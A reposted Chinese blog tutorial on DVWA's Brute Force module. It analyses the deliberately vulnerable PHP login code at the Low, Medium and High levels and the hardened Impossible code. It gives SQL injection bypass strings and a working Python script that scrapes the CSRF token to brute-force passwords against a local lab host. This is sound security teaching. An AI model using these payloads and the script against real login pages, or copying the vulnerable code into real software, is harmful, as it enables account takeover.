zoukankan      html  css  js  c++  java
  • DVWA之Brute Force

    DVWA简介

    DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。

    DVWA共有十个模块,分别是Brute Force(暴力(破解))、Command Injection(命令行注入)、CSRF(跨站请求伪造)、File Inclusion(文件包含)、File Upload(文件上传)、Insecure CAPTCHA(不安全的验证码)、SQL Injection(SQL注入)、SQL Injection(Blind)(SQL盲注)、XSS(Reflected)(反射型跨站脚本)、XSS(Stored)(存储型跨站脚本)。

    需要注意的是,DVWA 1.9的代码分为四种安全级别:Low,Medium,High,Impossible。初学者可以通过比较四种级别的代码,接触到一些PHP代码审计的内容。

    Brute Force

    Brute Force,即暴力(破解),是指黑客利用密码字典,使用穷举法猜解出用户口令,是现在最为广泛使用的攻击手法之一,如2014年轰动全国的12306“撞库”事件,实质就是暴力破解攻击。

    1.jpg

    下面将对四种级别的代码进行分析。

    Low

    服务器端核心代码

    <?php
    
    if(isset($_GET['Login'])){
    //Getusername
    $user=$_GET['username'];
    
    //Getpassword
    $pass=$_GET['password'];
    $pass=md5($pass);
    
    //Checkthedatabase
    $query="SELECT*FROM`users`WHEREuser='$user'ANDpassword='$pass';";
    $result=mysql_query($query)ordie('<pre>'.mysql_error().'</pre>');
    
    if($result&&mysql_num_rows($result)==1){
    //Getusersdetails
    $avatar=mysql_result($result,0,"avatar");
    
    //Loginsuccessful
    echo"<p>Welcometothepasswordprotectedarea{$user}</p>";
    echo"<imgsrc="{$avatar}"/>";
    }
    else{
    //Loginfailed
    echo"<pre><br/>Usernameand/orpasswordincorrect.</pre>";
    }
    
    mysql_close();
    }
    
    ?>

    可以看到,服务器只是验证了参数Login是否被设置(isset函数在php中用来检测变量是否设置,该函数返回的是布尔类型的值,即true/false),没有任何的防爆破机制,且对参数username、password没有做任何过滤,存在明显的sql注入漏洞。

    漏洞利用

    方法一爆破利用burpsuite即可完成

    第一步抓包

    抓包

    第二步,ctrl+I将包复制到intruder模块,因为要对password参数进行爆破,所以在password参数的内容两边加$

    ctrl+I将包复制到intruder模块

    第三步选中Payloads,载入字典,点击Start attack进行爆破

    选中Payloads点击Start attack进行爆破

    最后,尝试在爆破结果中找到正确的密码,可以看到password的响应包长度(length)“与众不同”,可推测password为正确密码,手工验证登陆成功。

    找到正确密码

    方法二手工sql注入

    1. Username:admin’ or ’1′=’1  

    Password:(空)

    注入成功

    注入成功

    2. Username :admin’ #

    Password :(空)

    注入成功

    注入成功

    Medium

    服务器端核心代码

    <?php
    
    if(isset($_GET['Login'])){
    //Sanitiseusernameinput
    $user=$_GET['username'];
    $user=mysql_real_escape_string($user);
    
    //Sanitisepasswordinput
    $pass=$_GET['password'];
    $pass=mysql_real_escape_string($pass);
    $pass=md5($pass);
    
    //Checkthedatabase
    $query="SELECT*FROM`users`WHEREuser='$user'ANDpassword='$pass';";
    $result=mysql_query($query)ordie('<pre>'.mysql_error().'</pre>');
    
    if($result&&mysql_num_rows($result)==1){
    //Getusersdetails
    $avatar=mysql_result($result,0,"avatar");
    
    //Loginsuccessful
    echo"<p>Welcometothepasswordprotectedarea{$user}</p>";
    echo"<imgsrc="{$avatar}"/>";
    }
    else{
    //Loginfailed
    sleep(2);
    echo"<pre><br/>Usernameand/orpasswordincorrect.</pre>";
    }
    
    mysql_close();
    }
    
    ?>

    相比Low级别的代码,Medium级别的代码主要增加了mysql_real_escape_string函数,这个函数会对字符串中的特殊符号(x00,n,r,,’,”,x1a)进行转义,基本上能够抵御sql注入攻击,说基本上是因为查到说 MySQL5.5.37以下版本如果设置编码为GBK,能够构造编码绕过mysql_real_escape_string 对单引号的转义(因实验环境的MySQL版本较新,所以并未做相应验证);同时,$pass做了MD5校验,杜绝了通过参数password进行sql注入的可能性。但是,依然没有加入有效的防爆破机制(sleep(2)实在算不上)。

    具体的mysql_real_escape_string函数绕过问题详见

    http://blog.csdn.net/hornedreaper1988/article/details/43520257

    http://www.cnblogs.com/Safe3/archive/2008/08/22/1274095.html

    漏洞利用

    虽然sql注入不再有效,但依然可以使用Burpsuite进行爆破,与Low级别的爆破方法基本一样,这里就不赘述了。

    High

    服务器端核心代码

    <?php
    
    if(isset($_GET['Login'])){
    //CheckAnti-CSRFtoken
    checkToken($_REQUEST['user_token'],$_SESSION['session_token'],'index.php');
    
    //Sanitiseusernameinput
    $user=$_GET['username'];
    $user=stripslashes($user);
    $user=mysql_real_escape_string($user);
    
    //Sanitisepasswordinput
    $pass=$_GET['password'];
    $pass=stripslashes($pass);
    $pass=mysql_real_escape_string($pass);
    $pass=md5($pass);
    
    //Checkdatabase
    $query="SELECT*FROM`users`WHEREuser='$user'ANDpassword='$pass';";
    $result=mysql_query($query)ordie('<pre>'.mysql_error().'</pre>');
    
    if($result&&mysql_num_rows($result)==1){
    //Getusersdetails
    $avatar=mysql_result($result,0,"avatar");
    
    //Loginsuccessful
    echo"<p>Welcometothepasswordprotectedarea{$user}</p>";
    echo"<imgsrc="{$avatar}"/>";
    }
    else{
    //Loginfailed
    sleep(rand(0,3));
    echo"<pre><br/>Usernameand/orpasswordincorrect.</pre>";
    }
    
    mysql_close();
    }
    
    //GenerateAnti-CSRFtoken
    generateSessionToken();
    
    ?>

    High级别的代码加入了Token,可以抵御CSRF攻击,同时也增加了爆破的难度,通过抓包,可以看到,登录验证时提交了四个参数:username、password、Login以及user_token。

    验证登录

    每次服务器返回的登陆页面中都会包含一个随机的user_token的值,用户每次登录时都要将user_token一起提交。服务器收到请求后,会优先做token的检查,再进行sql查询。

    SQL查询

    同时,High级别的代码中,使用了stripslashes(去除字符串中的反斜线字符,如果有两个连续的反斜线,则只去掉一个)、 mysql_real_escape_string对参数username、password进行过滤、转义,进一步抵御sql注入。

    漏洞利用

    由于加入了Anti-CSRFtoken预防无脑爆破,这里就不推荐用Burpsuite了,还是简单用python写个脚本吧。

    下面是我自己写的一个脚本(python 2.7),用户名为admin,对password参数进行爆破并打印结果,仅供各位参考。

    from bs4 import BeautifulSoup
    import urllib2
    header={        'Host': '192.168.153.130',
    		'Cache-Control': 'max-age=0',
    		'If-None-Match': "307-52156c6a290c0",
    		'If-Modified-Since': 'Mon, 05 Oct 2015 07:51:07 GMT',
    		'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36',
    		'Accept': '*/*',
    		'Referer': 'http://192.168.153.130/dvwa/vulnerabilities/brute/index.php',
    		'Accept-Encoding': 'gzip, deflate, sdch',
    		'Accept-Language': 'zh-CN,zh;q=0.8',
    		'Cookie': 'security=high; PHPSESSID=5re92j36t4f2k1gvnqdf958bi2'}
    requrl = "http://192.168.153.130/dvwa/vulnerabilities/brute/"
    
    def get_token(requrl,header):
    	req = urllib2.Request(url=requrl,headers=header)
    	response = urllib2.urlopen(req)
    	print response.getcode(),
    	the_page = response.read()
    	print len(the_page)
    	soup = BeautifulSoup(the_page,"html.parser")
    	user_token = soup.form.input.input.input.input["value"] #get the user_token
    	return user_token
    
    user_token = get_token(requrl,header)
    i=0
    for line in open("rkolin.txt"):
    	requrl = "http://192.168.153.130/dvwa/vulnerabilities/brute/"+"?username=admin&password="+line.strip()+"&Login=Login&user_token="+user_token
    	i = i+1
    	print i,'admin',line.strip(),
    	user_token = get_token(requrl,header)
    	if (i == 10):
    		break

    get_token的功能是通过python的BeautifulSoup库从html页面中抓取user_token的值,为了方便展示,这里设置只尝试10次。

    运行脚本时的Burpsuite截图

    Burpsuite截图

    打印的结果从第二行开始依次是序号、用户名、密码、http状态码以及返回的页面长度。

    打印的结果

    对比结果看到,密码为password时返回的长度不太一样,手工验证,登录成功,爆破完成。

    Impossible

    服务器端核心代码

    <?php
    
    if(isset($_POST['Login'])){
    //CheckAnti-CSRFtoken
    checkToken($_REQUEST['user_token'],$_SESSION['session_token'],'index.php');
    
    //Sanitiseusernameinput
    $user=$_POST['username'];
    $user=stripslashes($user);
    $user=mysql_real_escape_string($user);
    
    //Sanitisepasswordinput
    $pass=$_POST['password'];
    $pass=stripslashes($pass);
    $pass=mysql_real_escape_string($pass);
    $pass=md5($pass);
    
    //Defaultvalues
    $total_failed_login=3;
    $lockout_time=15;
    $account_locked=false;
    
    //Checkthedatabase(Checkuserinformation)
    $data=$db->prepare('SELECTfailed_login,last_loginFROMusersWHEREuser=(:user)LIMIT1;');
    $data->bindParam(':user',$user,PDO::PARAM_STR);
    $data->execute();
    $row=$data->fetch();
    
    //Checktoseeiftheuserhasbeenlockedout.
    if(($data->rowCount()==1)&&($row['failed_login']>=$total_failed_login)){
    //Userlockedout.Note,usingthismethodwouldallowforuserenumeration!
    //echo"<pre><br/>Thisaccounthasbeenlockedduetotoomanyincorrectlogins.</pre>";
    
    //Calculatewhentheuserwouldbeallowedtologinagain
    $last_login=$row['last_login'];
    $last_login=strtotime($last_login);
    $timeout=strtotime("{$last_login}+{$lockout_time}minutes");
    $timenow=strtotime("now");
    
    //Checktoseeifenoughtimehaspassed,ifithasn'tlockedtheaccount
    if($timenow>$timeout)
    $account_locked=true;
    }
    
    //Checkthedatabase(ifusernamematchesthepassword)
    $data=$db->prepare('SELECT*FROMusersWHEREuser=(:user)ANDpassword=(:password)LIMIT1;');
    $data->bindParam(':user',$user,PDO::PARAM_STR);
    $data->bindParam(':password',$pass,PDO::PARAM_STR);
    $data->execute();
    $row=$data->fetch();
    
    //Ifitsavalidlogin...
    if(($data->rowCount()==1)&&($account_locked==false)){
    //Getusersdetails
    $avatar=$row['avatar'];
    $failed_login=$row['failed_login'];
    $last_login=$row['last_login'];
    
    //Loginsuccessful
    echo"<p>Welcometothepasswordprotectedarea<em>{$user}</em></p>";
    echo"<imgsrc="{$avatar}"/>";
    
    //Hadtheaccountbeenlockedoutsincelastlogin?
    if($failed_login>=$total_failed_login){
    echo"<p><em>Warning</em>:Someonemightofbeenbruteforcingyouraccount.</p>";
    echo"<p>Numberofloginattempts:<em>{$failed_login}</em>.<br/>Lastloginattemptwasat:<em>${last_login}</em>.</p>";
    }
    
    //Resetbadlogincount
    $data=$db->prepare('UPDATEusersSETfailed_login="0"WHEREuser=(:user)LIMIT1;');
    $data->bindParam(':user',$user,PDO::PARAM_STR);
    $data->execute();
    }
    else{
    //Loginfailed
    sleep(rand(2,4));
    
    //Givetheusersomefeedback
    echo"<pre><br/>Usernameand/orpasswordincorrect.<br/><br/>Alternative,theaccounthasbeenlockedbecauseoftoomanyfailedlogins.<br/>Ifthisisthecase,<em>pleasetryagainin{$lockout_time}minutes</em>.</pre>";
    
    //Updatebadlogincount
    $data=$db->prepare('UPDATEusersSETfailed_login=(failed_login+1)WHEREuser=(:user)LIMIT1;');
    $data->bindParam(':user',$user,PDO::PARAM_STR);
    $data->execute();
    }
    
    //Setthelastlogintime
    $data=$db->prepare('UPDATEusersSETlast_login=now()WHEREuser=(:user)LIMIT1;');
    $data->bindParam(':user',$user,PDO::PARAM_STR);
    $data->execute();
    }
    
    //GenerateAnti-CSRFtoken
    generateSessionToken();
    
    ?>

    可以看到Impossible级别的代码加入了可靠的防爆破机制,当检测到频繁的错误登录后,系统会将账户锁定,爆破也就无法继续。

    爆破提示

    同时采用了更为安全的PDO(PHP Data Object)机制防御sql注入,这是因为不能使用PDO扩展本身执行任何数据库操作,而sql注入的关键就是通过破坏sql语句结构执行恶意的sql命令。

    关于PDO:http://www.cnblogs.com/pinocchioatbeijing/archive/2012/03/20/2407869.html

    转自:http://www.freebuf.com/articles/web/116437.html

    本文原创作者:lonehand

  • 相关阅读:
    jTopo——js库
    node.js
    php 入门笔记
    D3 入门笔记
    webpack笔记
    React.js
    Grunt等前端自动化构建工具
    vue3.0的新特性
    electron-builder 打包流程
    vue里面如何下载图片,如何下载文件
  • 原文地址:https://www.cnblogs.com/csnd/p/11808087.html
Copyright © 2011-2022 走看看